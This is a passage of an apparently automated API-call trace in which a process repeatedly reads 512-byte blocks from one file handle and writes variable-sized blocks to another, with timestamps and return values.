lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.047] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x367, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.048] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.048] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.049] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.049] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.050] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.050] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x375, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.051] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.051] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x306, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.052] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.052] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x33b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.053] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.053] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.054] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.054] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.055] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.055] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xd3, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.056] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.056] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3f1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.057] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.057] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.058] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.058] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.059] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3b2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.059] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.060] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x31a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.060] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.061] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.061] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.062] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.062] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.063] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.063] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x36f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.064] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.064] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.065] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.065] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.066] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.066] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.067] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.067] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x34f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.068] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.068] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.069] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.069] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.070] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x214, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.071] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.071] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.072] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.072] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.073] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3a8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.073] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.073] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x342, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.074] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.075] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x38c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.075] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.076] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3c8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.076] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.077] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3e8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.077] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.077] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3c4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.078] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.079] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x374, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.079] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.080] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3a2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.080] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.081] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3ab, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.081] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.081] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.082] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.082] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x346, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.083] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.083] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3bf, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.084] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.084] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x365, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.085] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.085] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x369, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.088] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.089] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ea, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.089] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.090] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x324, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.090] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.091] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x312, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.091] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.092] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x313, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.092] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.093] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x325, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.093] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.094] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.094] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x8e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.095] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.095] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.096] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.096] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.097] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.097] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.098] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.098] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.099] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x386, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.099] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: 